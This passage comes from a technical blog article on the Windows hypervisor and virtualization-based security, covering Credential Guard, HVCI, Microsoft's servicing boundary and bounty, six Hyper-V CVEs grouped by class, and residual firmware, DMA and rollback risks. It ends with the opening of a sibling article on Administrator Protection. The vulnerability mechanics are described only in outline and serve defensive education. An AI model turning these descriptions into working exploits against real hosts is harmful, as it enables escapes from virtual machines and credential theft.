A user-mode process that runs inside VTL1's Isolated User Mode (IUM). Trustlets must be signed with the Windows System Component Verification certificate (Signature Level 12) and carry the IUM EKU `1.3.6.1.4.1.311.10.3.37`. The shipping inbox trustlets include `LSAISO.EXE` (Credential Guard), `VMSP.EXE` (host side of virtual TPM), and the vTPM provisioning trustlet [@ms-iso-user-mode-trustlets, @ionescu-bh-2015].

Credential Guard. LSAISO.EXE -- the LSA-Isolated trustlet -- runs in VTL1 Isolated User Mode. NTLM password hashes and Kerberos Ticket-Granting Tickets that LSASS used to keep in normal VTL0 memory are moved to VTL1 memory that VTL0 cannot read. VTL0 LSASS performs credential operations by sending a request to LSAISO over a secure-call channel mediated by the hypervisor's SynIC; LSAISO does the cryptographic work and returns a result. The plaintext of the credential never leaves VTL1. This is why a Ring-0 attacker on a Credential Guard-enabled Windows install cannot dump LSASS hashes -- they aren't in LSASS [@ms-iso-user-mode-trustlets]. The hypervisor primitives composed: per-VTL SLAT (to hide LSAISO's memory) + SynIC (to deliver secure calls) + intercepts (to catch VTL0 attempts to access LSAISO memory). See the sibling Credential Guard / NTLMless article for VTL1 internals.

The VTL0-to-VTL1 calling convention. A VTL0 caller fills in a shared parameter page, signals a SynIC interrupt configured for VTL transition, and yields. The hypervisor switches SLAT context to VTL1, delivers the message, and lets the Secure Kernel dispatch it via `IumInvokeSecureService` to a registered VTL1 service. On return, the hypervisor switches contexts back. The whole round-trip is mediated by hypervisor primitives the calling VTL cannot bypass [@ionescu-bh-2015].

Application Control (WDAC). The same VTL1 code-integrity service that backs HVCI also evaluates user-mode policy. When VTL0 user mode tries to load a binary that is restricted by WDAC policy, the load becomes a secure call into VTL1; VTL1's policy engine evaluates the signature, the certificate chain, and the configured policy; the secure call returns approval or denial. WDAC policy lives in VTL1, the policy database lives in VTL1, and a VTL0 administrator who has been compromised cannot edit either. The hypervisor primitives composed: same as HVCI, plus a richer secure-call API for policy evaluation.

VBS Enclaves. A third-party application can load native code into a VTL1 IUM enclave. The enclave executes in VTL1, with its memory hidden from VTL0; the application talks to the enclave through a secure-call ABI exposed by the Secure Kernel. Architecturally parallel to Credential Guard but available to ordinary application developers. The hypervisor primitives composed: per-VTL SLAT (to hide enclave memory) + secure-call ABI (to invoke enclave code) + a Secure Kernel API for enclave creation, attestation, and destruction.

System Guard Secure Launch (DRTM). Intel TXT's SENTER instruction (and AMD's SKINIT on AMD platforms) executes a hardware-rooted dynamic measurement of the hypervisor and the Secure Kernel into TPM PCRs 17-22 after firmware initialization [@ms-system-guard-secure-launch]. This re-establishes the trust root post-firmware: a pre-boot firmware compromise that survived UEFI Secure Boot cannot silently poison the hypervisor's launch state without showing up as an unexpected measurement in a PCR that VTL1 can read. The hypervisor primitives composed: DRTM event registration with the hardware + TPM PCR extension + a VTL1-side attestation API. See the sibling Secure Boot article for the static-RTM half of the same story.

Kernel DMA Protection. External devices over Thunderbolt, USB4, or hot-plug PCIe can issue DMA to arbitrary physical addresses, bypassing the CPU's MMU entirely. The hypervisor configures the IOMMU (Intel VT-d / AMD-Vi) to deny DMA from externally-attached devices outside of explicitly-authorized memory regions, and to refuse DMA from any device before its kernel-mode driver has been loaded under a trusted policy [@ms-kernel-dma-protection]. The hypervisor primitives composed: hypervisor-owned IOMMU configuration + memory-access intercepts on the IOMMU configuration MMIO region.

The shape of the table is the point.

Feature	Composed primitives	Verbatim hypervisor mechanism
HVCI	per-VTL SLAT + memory-access intercepts + secure-call ABI	VTL1 vets each VTL0 page-mapping change before granting +X
Credential Guard	per-VTL SLAT + SynIC + intercepts	LSAISO trustlet memory absent from VTL0 SLAT mapping
WDAC (AppControl)	secure-call ABI + VTL1 policy engine	VTL0 binary load = secure call into VTL1 CI service
VBS Enclaves	per-VTL SLAT + secure-call ABI	Third-party VTL1 IUM enclave invoked over secure call
System Guard Secure Launch	hardware DRTM (TXT/SKINIT) + TPM PCR extension	`SENTER` / `SKINIT` measures hypervisor into PCRs 17-22
Kernel DMA Protection	hypervisor-owned IOMMU + MMIO intercepts	VT-d/AMD-Vi denies DMA outside authorized regions

The hypervisor knows nothing about NTLM hashes, Kerberos tickets, code-signing certificates, WDAC policy XML, or DMA-region authorization. All of that policy lives in VTL1 -- in the Secure Kernel, in LSAISO, in the WDAC service. The hypervisor only provides the *mechanism* for one piece of policy to evaluate a request from another piece of policy in isolation. This is the architectural separation that lets the hypervisor binary stay small and the Windows-side security feature set keep growing.

The pattern: each feature is a different composition of the same five primitives (partitions, hypercalls, intercepts, SynIC, per-VTL SLAT). The hypervisor is genuinely a primitive in the formal sense -- a small set of mechanisms that compose into many security policies. If the hypervisor is the mechanism, the boundary the hypervisor enforces is the contract. Microsoft commits to servicing certain attacks against that boundary and explicitly excludes others. To know what we are getting, we need to read the contract.

9. The Security Boundary Microsoft Commits To

The Microsoft Security Servicing Criteria for Windows is a public document. It enumerates which classes of attack Microsoft will issue a CVE and an out-of-band patch for, and which it will not. For the hypervisor, the document is unusually specific [@ms-msrc-servicing-criteria].

The two relevant boundaries:

Hypervisor / virtualization boundary. An L1-guest-to-host or guest-to-guest break is a serviced boundary. If a guest VM can execute code in the root partition or in another guest's address space, Microsoft will issue a CVE.
Virtual Secure Mode (VBS) boundary. VTL0 kernel-mode code reading or writing VTL1 memory, or executing VTL1 code, is a serviced break. If a Ring-0 attacker in VTL0 can defeat the per-VTL SLAT, Microsoft will issue a CVE.

What the servicing criteria does not commit to is also worth naming. A same-VTL elevation of privilege inside a guest (a guest user becoming guest SYSTEM) is not a hypervisor break -- it is a Windows EoP, serviced under the Windows kernel boundary, not the hypervisor boundary. A denial-of-service of the host from a guest is generally not a serviced hypervisor break unless it produces a memory corruption that an attacker can ride to RCE. An administrator in the root partition reading guest memory is not a break at all -- the root partition is part of the hypervisor's TCB by definition, and root-partition admin is hypervisor-admin in the threat model.

The dollar figures for these boundaries are documented in the Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]. The program ranges from $5,000 for the lowest-impact qualifying submission up to $250,000 for the highest. The eligibility language is verbatim:

An eligible submission includes a Remote Code Execution (RCE) vulnerability in Microsoft Hyper-V that enables a L1 guest virtual machine to compromise the hypervisor, escape from the guest virtual machine to the host, or escape to another L1 guest virtual machine. -- Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]

$250,000 is the highest standing Hyper-V bounty in the industry. Comparable programs from the other major hypervisor vendors do not publish the same calibration. KVM is a community project with no vendor-paid bounty pool of equivalent size. Xen is a Linux Foundation project that runs a bug bounty through HackerOne but does not publicly attach a $250,000 figure to a guest-to-host RCE. ESXi (Broadcom) does not publish a standing bounty program with a per-bug ceiling; bounty payments for ESXi RCEs typically flow through Pwn2Own and similar marketplaces, where Trend Micro's Zero Day Initiative sets the prize for any given competition.The bounty calibration is itself a data point. If $250,000 were too high, Microsoft would be drowning in submissions; if it were too low, the public CVE record would show more hypervisor breaks reported through Pwn2Own than directly to MSRC. The current equilibrium -- two to four Microsoft-direct Hyper-V CVEs per year, plus zero Pwn2Own Hyper-V guest-to-host escapes through Pwn2Own Berlin 2025 [@zdi-pwn2own-day3] -- is consistent with the bounty being calibrated roughly correctly relative to the cost of finding a real bug.

Vendor	Hypervisor	Published bounty	Ceiling	Servicing-criteria boundary published
Microsoft	Hyper-V / `hvix64.exe`	Yes	$250,000	Yes, verbatim language
Xen Project	Xen	Yes (HackerOne)	Lower, varies	Yes, security policy
KVM	KVM (community)	No standing program	--	No vendor-published criteria
Broadcom/VMware	ESXi	No standing public bounty	--	Vendor advisories per CVE
seL4 Project	seL4	No (proof-rooted argument)	--	Functional-correctness proof [@sel4-whitepaper]

The seL4 row is included because seL4 is the only hypervisor in the table whose claim to a security boundary is mathematical rather than operational. seL4 ships approximately ten thousand lines of C and assembly with a machine-checked proof of functional correctness against a higher-level specification. The proof took roughly twenty-five person-years and covers a microkernel that does not by itself ship the full surface area of Hyper-V. The Microsoft hypervisor is unverified at the §7-estimated line count an order of magnitude larger; its security argument is operational (a small TCB, heavy fuzzing, a standing bounty, public servicing) rather than mathematical.

A serviced boundary is a contract. Contracts are not promises; they are obligations that come due when an attacker finds a way around them. To see what the contract has actually had to pay out, we read the public CVE record.

10. The Public Track Record -- Six Worked CVEs Across Three Classes

We do not need an exhaustive Hyper-V CVE catalog to understand the boundary's real shape. Six worked examples, drawn from three distinct attack classes, cover every public failure mode the boundary has produced since 2018. We walk them in order.

Class A: Device emulation in the root partition

CVE-2021-28476 (vmswitch.sys, May 2021, CVSS 9.9). Discovered by Ophir Harpaz at Guardicore Labs and Peleg Hadar at SafeBreach Labs using Guardicore's hAFL1 hypervisor fuzzer, this was a guest-controlled OID_SWITCH_NIC_REQUEST OID parameter passed to the host-side vmswitch.sys driver. The driver dereferenced an attacker-influenced object pointer; the host kernel performed an arbitrary pointer dereference; the guest gained RCE in the root partition's kernel mode. The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects guest-to-host RCE with Azure-scale blast radius: the bug was reachable from the vmswitch driver shipped in Windows builds well before the May 2021 patch, per the Guardicore Labs technical analysis [@nvd-cve-2021-28476]. The bug is the canonical anchor for "device emulation in the root partition is the largest Hyper-V attack surface."

CVE-2025-21333 (NT Kernel Integration VSP, January 2025, CWE-122). The first publicly-acknowledged in-the-wild exploited Hyper-V CVE. The "Hyper-V NT Kernel Integration VSP" is a relatively new component that ties the Windows kernel-mode container architecture to Hyper-V's VSP/VSC pattern. A guest-controlled input triggered a heap-based buffer overflow on the host side of the integration; the host's address space was corruptible from a guest [@nvd-cve-2025-21333]. The operational pattern matches the vmswitch family: a host-side component receives structured, attacker-shaped input from a guest, and the host-side component overflows.

Class B: The hypercall input-validation path

CVE-2024-21407 (Hyper-V hypercall UAF, March 2024, CVSS 8.1, CWE-416). The rare case where the bug is in hvix64.exe / hvax64.exe itself, not in a root-partition driver. A guest crafted specially-formed file-operation hypercalls; the hypervisor dereferenced freed memory; the guest gained arbitrary host code execution [@nvd-cve-2024-21407].

CVE-2024-30092 (Hyper-V RCE, October 2024, CWE-20 + CWE-829). A Hyper-V remote code execution that combined improper input validation with inclusion of functionality from an untrusted control sphere -- another hypercall-path-class bug [@nvd-cve-2024-30092].

CVE-2024-49117 (Hyper-V RCE, December 2024, CVSS 8.8). A third 2024 Hyper-V RCE; the December Patch Tuesday entry rounded out a year in which three publicly-disclosed Hyper-V RCEs landed in twelve months, the most since the 2018 vmswitch family [@nvd-cve-2024-49117].

Class C: VTL0-to-VTL1 (the VBS break, not the hypervisor break)

CVE-2020-0917 and CVE-2020-0918 -- Amar and King, Black Hat USA 2020. Saar Amar and Daniel King's "Breaking VSM by Attacking SecureKernel" disclosed two paired vulnerabilities discovered with their Hyperseed hypercall fuzzer retargeted at securekernel!IumInvokeSecureService, the secure-call entry point. Vulnerability #1 -- which maps to CVE-2020-0917 -- is an out-of-bounds write in securekernel!SkmmObtainHotPatchUndoTable, the function that parses the hot-patch undo table at secure-call invocation time.The Black Hat USA 2020 deck (verified via pdftotext at the canonical MSRC-Security-Research GitHub URL) explicitly labels Vulnerability #1 as OOB Write, in slides titled "The Vulnerable Function" and "The OOB" in the "Hardening SK" section [@amar-king-bh-2020]. Several secondary writeups across the web have transcribed the bug class as "OOB read," which is incorrect; the deck itself is the primary source and says write. The functions involved are also commonly conflated: IumInvokeSecureService is the secure-call dispatcher Hyperseed retargets to reach the buggy code; the actual bug is in SkmmObtainHotPatchUndoTable. The NVD entries for both CVEs are tracked as CWE-269 (Improper Privilege Management). Vulnerability #2 -- CVE-2020-0918 -- is a design flaw in SkmmUnmapMdl that lets VTL0 pass a fully attacker-controlled Memory Descriptor List to SkmiReleaseUnknownPTEs.

The Microsoft response is documented end-to-end in the same deck: the Secure Kernel pool was migrated to segment heap in mid-2019, four W+X regions were reduced to +X only, and SkpgContext -- a HyperGuard equivalent for Secure Kernel -- was introduced.

This is a different failure class than vmswitch RCE: not guest-to-host, but VTL0-to-VTL1 -- a Secure Kernel break reached through the hypervisor's secure-call dispatch from a privileged VTL0 attacker. Microsoft services it under the VBS / VSM boundary in the servicing criteria document, even though no guest VM is involved.

Key idea: Every public Hyper-V CVE since 2018 lives in one of three narrow code paths -- device emulation, hypercall input validation, or VTL0-to-VTL1 secure-call dispatch. The TLFS-visible primitives (intercepts, SynIC, per-VTL SLAT) have produced none.

The Pwn2Own dimension

Through Pwn2Own Berlin 2025, no public live Hyper-V guest-to-host escape has been demonstrated at Pwn2Own. The cross-vendor analogue -- and the industry's best calibration of how hard a hypervisor escape is to find when a researcher has a public dollar incentive and a deadline -- is the first-ever ESXi escape in Pwn2Own history, executed by Nguyen Hoang Thach of STAR Labs SG on Day Two (May 16, 2025) using a single integer overflow vulnerability in the hypervisor's DMA-handling path. The award was $150,000 plus 15 Master of Pwn points; STAR Labs went on to win overall Master of Pwn for the competition with $320,000 across three days [@zdi-pwn2own-day3].

The technique class is a TOCTOU on a length field read twice during a DMA operation: the first read validates the length, the second read uses it; race the second read and you write past a fixed-size buffer on the host heap. The exploit class is structurally the same as the vmswitch family, just landed in a different vendor's device-emulation path.

CVE	Class	Year	CVSS	Location	Source
CVE-2021-28476	A: device emulation	2021	9.9	`vmswitch.sys` (root partition)	[@nvd-cve-2021-28476]
CVE-2025-21333	A: device emulation	2025	7.8	NT Kernel Integration VSP (root partition)	[@nvd-cve-2025-21333]
CVE-2024-21407	B: hypercall path	2024	8.1	`hvix64.exe` / `hvax64.exe` (hypervisor binary)	[@nvd-cve-2024-21407]
CVE-2024-30092	B: hypercall path	2024	7.5	Hyper-V hypercall validation	[@nvd-cve-2024-30092]
CVE-2024-49117	B: hypercall path	2024	8.8	Hyper-V hypercall validation	[@nvd-cve-2024-49117]
CVE-2020-0917/0918	C: VTL0-to-VTL1	2020	6.8 (per MSRC)	`securekernel.exe` (VTL1, reached via secure call)	[@amar-king-bh-2020]

flowchart LR subgraph CA["Class A: device emulation (root partition)"] Vmswitch["vmswitch.sys -- CVE-2021-28476"] Vsp["NT Kernel Integration VSP -- CVE-2025-21333"] end subgraph CB["Class B: hypercall input validation (hypervisor binary)"] UAF["CVE-2024-21407 (UAF)"] Input["CVE-2024-30092"] Hpcall["CVE-2024-49117"] end subgraph CC["Class C: VTL0-to-VTL1 (secure call dispatch)"] Oob["CVE-2020-0917 (OOB write)"] Mdl["CVE-2020-0918 (SkmmUnmapMdl)"] end Guest["Guest VM"] --> CA Guest --> CB Vtl0["Privileged VTL0 (kernel)"] --> CC

This is the third insight the article is built around. The reader's prior model may have been "hypervisors fail in mysterious, deep ways; the boundary is fragile in unknown places." The new model is "every public Hyper-V escape since 2018 lives in one of three narrow code paths, and the TLFS-visible primitives have produced none." The narrowness of the failure space is itself a security argument. The hypervisor's micro-kernelized design has held; what has not always held are the components Microsoft chose to put next to the hypervisor, in the root partition's user mode and kernel mode, by deliberate architectural choice in 2008.

Six worked examples; three classes; one boundary; an unflinching public record. The boundary is alive and producing CVEs at roughly two to four per year. But every CVE so far has lived somewhere the hypervisor itself controls. The interesting question is what lives in places it does not control.

11. The Residual Attack Surface -- Beneath, Beside, and Around

The hypervisor enforces a clean boundary against everything above it -- the NT kernel, user mode, even other guest VMs. It cannot, by construction, enforce anything against what lives below or beside it. Three structural classes of residual attack matter. We walk each.

11.1 Firmware below the hypervisor

System Management Mode (SMM), the UEFI runtime, the platform Manageability Engine (Intel ME), and the AMD Platform Security Processor (PSP) all run at higher privilege than the hypervisor for parts of boot and runtime. SMM in particular is a CPU mode that is invoked through System Management Interrupts (SMI) and has unrestricted access to all of physical memory, including the hypervisor's own pages. If the OEM-supplied SMM handler contains an exploitable bug, an SMI can run attacker code in a privilege mode strictly above the hypervisor's.

The threat is not hypothetical. The Binarly research team's 2023 LogoFAIL disclosures showed entire classes of image-parser bugs in UEFI firmware reachable from a privileged OS context; BootHole (CVE-2020-10713, a buffer overflow in GRUB2's grub.cfg parser) and BlackLotus (CVE-2022-21894, a UEFI Secure Boot bypass) showed that pre-boot bugs in widely-deployed bootloaders could ride past Secure Boot. None of these is a hypervisor bug; all of them are residual attack surface from the hypervisor's point of view.

Microsoft's mitigation is the dynamic root of trust for measurement -- System Guard Secure Launch -- which we touched on in section 8. After UEFI Secure Boot has done its static-RTM job, Intel TXT's SENTER (or AMD's SKINIT) executes a CPU-hardware-rooted late launch: the CPU resets to a known state, runs an Intel- or AMD-signed Authenticated Code Module (ACM), and measures the hypervisor binary into TPM PCRs 17-22 before transferring control to it. The result is that even if pre-boot firmware is compromised, the post-DRTM PCR values reflect the actual hypervisor binary; a compromised UEFI cannot silently substitute a different hypervisor without changing the attestation [@ms-system-guard-secure-launch, @ms-hardware-root-of-trust]. The residual after DRTM: OEMs that don't ship Secure Launch on their motherboards, or that ship buggy SMM handlers that can be invoked after launch.

11.2 Hardware side channels

Microarchitectural side-channel attacks cross the VTL boundary at the level of CPU implementation, not at the level of architectural specification. The 2018 Spectre and Meltdown disclosures -- followed by the L1TF, MDS, Retbleed, and CacheWarp families in the years since -- showed that speculatively-executed code on a CPU can leak microarchitectural state across privilege boundaries that the architectural ISA promises to protect.

Microsoft's mitigation cadence has been in-tree and aggressive: Kernel Virtual Address Shadow (the Windows equivalent of KPTI) for Meltdown; IBRS, STIBP, and retpolines for Spectre v2; HyperClear for L1TF on Hyper-V hosts. Each Patch Tuesday since 2018 has shipped at least one microarchitectural mitigation; cumulatively the cost has been measurable but bounded.

Note: The microarchitectural ceiling is hardware, not software. Intel TDX and AMD SEV-SNP -- the two confidential-computing architectures that move the trust root from the hypervisor to per-VM hardware encryption -- both explicitly disclaim resistance to this class. If the CPU leaks across a Spectre-class side channel, no software-level isolation primitive (VTL, partition, SEAM, SEV-SNP) can fully recover the property. The mitigation is hardware that doesn't leak, and that mitigation arrives one CPU generation at a time.

11.3 IOMMU and DMA bypass

The IOMMU -- Intel VT-d, AMD-Vi -- is the hardware that gates DMA from peripheral devices to physical memory. If the IOMMU is configured correctly, a Thunderbolt-attached device cannot read or write arbitrary memory; it can only DMA to regions the OS has explicitly mapped for it. If the IOMMU is disabled, configured permissively, or has firmware bugs of its own, DMA becomes an end-run around every architectural protection above it -- including the hypervisor's.

The threat is again not hypothetical. Bjorn Ruytenberg's Thunderspy disclosure in 2020 documented seven DMA-class vulnerabilities in Thunderbolt 3 firmware, demonstrating that an attacker with physical access could read or modify arbitrary memory on a powered-on system through a malicious peripheral [@thunderspy]. The Microsoft mitigation is Kernel DMA Protection (Windows 10 1803 and later): the hypervisor configures the IOMMU at boot to deny DMA from externally-attached devices outside of explicitly authorized regions, and DMA from any peripheral whose driver has not been loaded under a trusted policy is refused at the IOMMU [@ms-kernel-dma-protection]. The structural residual: pre-boot DMA, before Windows has finished configuring the IOMMU; client motherboards that still ship with VT-d or AMD-Vi disabled in BIOS; OEMs that disable Kernel DMA Protection by default.

11.4 Hypervisor downgrade and rollback

Alon Leviev's "Windows Downdate" at Black Hat USA 2024 disclosed a class of attack that the prior three sections do not cover: rollback of the hypervisor binary itself to a previously-vulnerable, but still validly-signed, build [@nvd-cve-2024-21302].

The structural argument: UEFI Secure Boot prevents loading an unsigned hvix64.exe. It does not prevent loading an older hvix64.exe that is unsigned only in the sense of being unrevoked. If Microsoft fixes a Secure Kernel bug in build N+1 and a VTL0 attacker can convince the system to load build N at the next reboot, the patched bug is alive again. CVE-2024-21302 demonstrated exactly this rollback against both the hypervisor and the Secure Kernel through manipulation of the Windows Update servicing pipeline. The mitigation is mandatory-update servicing combined with proactive revocation list (dbx) hygiene -- once an older binary's hash is in the UEFI revocation list, Secure Boot will refuse to load it -- and Microsoft completed mitigations across Windows 10 1507 through Windows Server 2019 in the July 8, 2025 update wave [@nvd-cve-2024-21302].

flowchart TD HW["Hardware (CPU, RAM, IOMMU, TPM)"] SM["System Management Mode (Ring -2) -- residual: SMM handler bugs"] FW["UEFI firmware -- residual: LogoFAIL, BootHole, BlackLotus"] DR["DRTM ACM (Intel TXT / AMD SKINIT)"] HV["Microsoft Hypervisor (hvix64 / hvax64)"] Iommu["IOMMU (VT-d / AMD-Vi) -- residual: Thunderspy, pre-boot DMA"] Vtl1["VTL1 (Secure Kernel + trustlets)"] Vtl0["VTL0 (NT kernel + user mode)"] Side["Microarchitectural side channels -- Spectre / Meltdown / MDS / Retbleed"] Update["Windows Update servicing -- residual: hypervisor rollback (CVE-2024-21302)"] HW --> SM SM --> FW FW --> DR DR --> HV HV --> Iommu HV --> Vtl1 HV --> Vtl0 Side -.->|"cross all boundaries"| HV Update -.->|"can roll hypervisor back"| HV The hypervisor is necessary but not sufficient. The firmware-Secure-Boot-DRTM substrate beneath it, the microarchitectural ceiling above it, the IOMMU configuration beside it, and the Windows Update pipeline that decides which hypervisor build runs next are co-equal members of the same boundary. None of them is the hypervisor; all of them have to do their job for the hypervisor's guarantees to hold. The substrate is real, but the boundary is the combination of the substrate and what holds it up.

Necessary, not sufficient. That phrase is the article's honest answer to the question "how good is the substrate?" The answer is that the substrate is genuine, the boundary is published, the bounty calibration is the highest in the industry, the public CVE record is alive and narrow, and the residual attack surface lives in places the hypervisor cannot by construction control. The substrate is what we have explored in detail; what holds it up is what we have just sketched. The last section turns from theory to practice.

12. Practical Guide, FAQ, and Closing

If you have read this far, the natural next question is "is this on, on my machine, and how do I check?" The practical answer is short.

12.1 Enabling and verifying VBS

VBS is configurable through several paths: Group Policy (Computer Configuration > Administrative Templates > System > Device Guard), Intune, MDM CSPs (DeviceGuard/EnableVirtualizationBasedSecurity, DeviceGuard/ConfigureSystemGuardLaunch), the Windows Security UI, or directly via bcdedit /set hypervisorlaunchtype Auto. Verification is best done with three small commands.

msinfo32 -> the Device Guard / Virtualization-based Security row. "Services Configured" lists what policy has requested; "Services Running" lists what is actually active. Kernel DMA Protection and Secure Launch each appear as their own row.
Get-CimInstance -ClassName Win32_DeviceGuard -> VirtualizationBasedSecurityStatus (0 = off, 1 = enabled but not running, 2 = running); SecurityServicesRunning array (HVCI, Credential Guard, etc.); RequiredSecurityProperties (the policy floor).
bcdedit /enum -> hypervisorlaunchtype Auto is the default; loadoptions DISABLE_VBS_* is how an administrator can opt out (you should not see these flags on a properly-configured machine).

{` // Given a parsed Win32_DeviceGuard object, compute whether VBS is healthy. // The actual Win32_DeviceGuard schema is on Microsoft Learn; this is the // decision logic an operator would write against it. function checkVbsHealth(dg) { const result = { ok: false, reasons: [] };

// VBS itself if (dg.VirtualizationBasedSecurityStatus !== 2) { result.reasons.push('VBS is not running (status != 2)'); }

// HVCI (Memory Integrity) if (!dg.SecurityServicesRunning.includes(2)) { result.reasons.push('HVCI / Memory Integrity is not running'); }

// Credential Guard if (!dg.SecurityServicesRunning.includes(1)) { result.reasons.push('Credential Guard is not running'); }

// Required floor properties (e.g. Secure Boot, DMA protection, SMM mitigation) const requiredFloor = [1, 2, 3]; // service codes per Win32_DeviceGuard for (const r of requiredFloor) { if (!dg.AvailableSecurityProperties.includes(r)) { result.reasons.push('Missing required security property: ' + r); } }

result.ok = result.reasons.length === 0; return result; }

const example = { VirtualizationBasedSecurityStatus: 2, SecurityServicesRunning: [1, 2, 3], AvailableSecurityProperties: [1, 2, 3, 4, 5], }; console.log(JSON.stringify(checkVbsHealth(example), null, 2)); // -> { ok: true, reasons: [] } `}

Note: Three commands, in order: msinfo32 for the human-readable summary; Get-CimInstance -ClassName Win32_DeviceGuard | Format-List * for the structured detail; bcdedit /enum {current} to confirm hypervisorlaunchtype Auto and the absence of DISABLE_VBS_* load options. If all three agree that VBS, HVCI, and Credential Guard are running, you are in the configuration this article describes.

12.2 Operational pitfalls

Two operational realities are worth flagging. First, HVCI has a driver block list and will refuse to enable Memory Integrity if any incompatible driver is installed; the usual offenders are older anti-cheat drivers, third-party virtualization clients (VMware Workstation pre-2021, VirtualBox pre-6.1), and certain disk-encryption or storage-filter drivers. Microsoft maintains a public block list; the Memory Integrity UI in Windows Security will report the specific blocking driver. Second, nested virtualization is supported for Hyper-V guests on Windows 10/11 client and Server 2016+, and is required by some development workflows (WSL2 with nested containers, certain Visual Studio device emulators). Nested virtualization changes the threat model -- the L0 hypervisor still owns the box, but the L1 guest now runs its own hypervisor with its own VTL split -- so a compromised L1 guest with VBS enabled still does not give an L1 attacker a path to the L0 host.

12.3 The substrate cross-reference

This article is the substrate of the Windows security series at paragmali.com. The siblings build on what is here:

Secure Boot in Windows -- the static-RTM half of the boot trust chain that hands off to the hypervisor.
VBS Trustlets: What Actually Runs in the Secure Kernel -- the VTL1 internals that the hypervisor's secure-call ABI delivers requests to.
NTLMless: The Death of NTLM in Windows -- the Credential Guard story from inside LSAISO.
Adminless: Administrator Protection in Windows -- the user-mode admin trust model that the kernel-mode VBS boundary makes possible.
Can This Code Do This? Windows Access Control -- the access-control surface that VBS supplements but does not replace.

12.4 Frequently asked questions

The 10-30 percent number is folklore from the pre-SLAT era or from systems running HVCI-incompatible drivers in compatibility mode. For typical workloads on modern hardware (post-2018 CPUs with VT-x or AMD-V and SLAT), the measured overhead of VBS plus HVCI plus Credential Guard sits in the low single digits. Gaming and high-throughput I/O workloads can show larger gaps, especially on systems where the BIOS forces nested virtualization off or where IOMMU is disabled. The trade-off for that overhead is the security-boundary set described in this article. No. VBS is a Virtual Trust Level split *inside* the root partition. There are no extra VMs. The normal Windows install is VTL0; the Secure Kernel plus its trustlets is VTL1. Both VTLs live in the same partition, share the same physical CPU, and are scheduled by the hypervisor as separate VTL contexts -- not as separate VMs. A Hyper-V guest VM, by contrast, is a child partition entirely separate from the root partition. The two architectures share a hypervisor binary but use different parts of it. No. SYSTEM is a high VTL0 user-mode token; the hypervisor sits architecturally above all of Ring 0, which is where SYSTEM-loaded kernel drivers ultimately run. The point of the entire article is that "SYSTEM owns the box" is wrong on a VBS-enabled Windows install. SYSTEM is the most privileged Windows identity; the hypervisor is the most privileged *software*, and the two are not the same thing. No. Secure Boot prevents loading an *unsigned* `hvix64.exe`. It does not prevent loading an older, signed-but-vulnerable `hvix64.exe` that has not been added to the UEFI revocation list. That gap is what CVE-2024-21302 (Windows Downdate) exploited, and the mitigation is mandatory-update servicing combined with prompt revocation-list (`dbx`) hygiene [@nvd-cve-2024-21302]. No. seL4 is formally verified at approximately ten thousand lines of code with a roughly twenty-five-person-year proof effort. The Microsoft hypervisor is unverified at an estimated one to two hundred thousand lines of code. The hypervisor's security argument is operational -- a small TCB, heavy continuous fuzzing, a standing \$5K-\$250K bounty, public servicing criteria, an unflinching public CVE record -- rather than mathematical [@sel4-whitepaper, @ms-msrc-bounty-hyperv]. Yes, in terms of binary identity, servicing criteria, and bounty eligibility. The Microsoft hypervisor that boots on a Windows 11 client laptop and the one that boots on an Azure host server are derived from the same codebase, ship with the same servicing commitments, and qualify for the same Hyper-V bounty. The threat model differs -- Azure adds multi-tenant guest-to-guest isolation, hardware confidential-VM extensions, and a different management surface -- but the substrate is shared.

12.5 Closing

The reason SYSTEM on a Windows 11 box cannot read LSASS, load an unsigned driver, or patch ntoskrnl.exe is now fully accounted for. An hvix64.exe or hvax64.exe loaded by hvloader.efi before winload.exe ever ran. A VTL split inside the root partition, made possible by Hepkin and Kishan's 2013 patent and shipped with Windows 10 RTM in 2015. Per-VTL SLAT enforcement that the NT kernel architecturally cannot touch, because the SLAT tables live in pages the hypervisor never maps into a VTL0 view. A Microsoft-published security boundary and a $5,000-$250,000 bounty calibrating the boundary's value, both of which are unique in the industry at this writing. A public CVE record of six worked examples across three narrow classes that the boundary has had to pay out on since 2018. And a residual attack surface -- firmware below, side channels above, IOMMU bypass beside, hypervisor rollback through the update pipeline -- that the substrate cannot, by construction, eliminate.

The hypervisor is what every other article in this series sits on. Now you have the substrate in hand. The Secure Kernel article reads differently when you have walked the per-VTL SLAT yourself. The Credential Guard article reads differently when you know that LSAISO is invoked through a hypercall-mediated secure call. The Secure Boot article reads differently when you know that the hypervisor's DRTM measurement re-establishes the trust root after firmware. The Adminless article reads differently when you know that the privilege ceiling on Windows 11 is not Ring 0 but a hardware boundary above it.

Above Ring Zero is not a metaphor. It is an instruction-set state. The Windows hypervisor lives there, owns the page tables that say what the OS can see, and is the architectural reason "SYSTEM-on-Windows-11" cannot do things SYSTEM used to be allowed to do.

Adminless: How Windows Finally Made Elevation a Security Boundary

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**Administrator Protection (informally "Adminless") replaces Windows 11's split-token UAC with a separate, system-managed local user account.** The operating system creates this **System Managed Administrator Account (SMAA)** per local admin, links it to the primary admin via paired SAM attributes, and uses it to host elevated processes in a fresh logon session gated by Windows Hello. The kernel asks LSA to authenticate "a new instance of the shadow administrator" without any SMAA credential because the SMAA has none. The mechanism makes the elevation path a security boundary for the first time, with bulletin-grade fixes when it fails. Microsoft shipped it in KB5067036 on October 28, 2025, then reverted it on December 1, 2025 over an application-compatibility issue, not a security failure. This article walks the twenty-year argument that produced the design, the nine pre-GA bypasses Forshaw found and Microsoft fixed, and exactly where the new boundary still leaks.

1. Two tokens, one user, twenty years

Open an elevated console on a Windows 11 device with the registry value TypeOfAdminApprovalMode = 2 set, and run whoami /all. The user name is no longer yours. It is ADMIN_<sixteen random characters> -- a local account you never created, owned by an operating-system component you never ran, in a logon session that did not exist five seconds ago and will not exist five seconds after the console closes.

For twenty years, an elevated Windows command prompt reported the same user name as the unelevated one. The integrity level changed. The token changed. The user did not. That single architectural fact is the load-bearing premise of every UAC bypass ever published. The Vista User Account Control design from 2006 issued two tokens at logon for a member of the local Administrators group: a filtered standard-user token for everyday work, and a full admin token linked to it via the TokenLinkedToken field [@ms-uac-how-it-works]. When the user clicked Yes on a consent prompt, the Application Information service called CreateProcessAsUser with the linked token. Same user. Same profile. Same HKCU. Same logon session. Different integrity level.

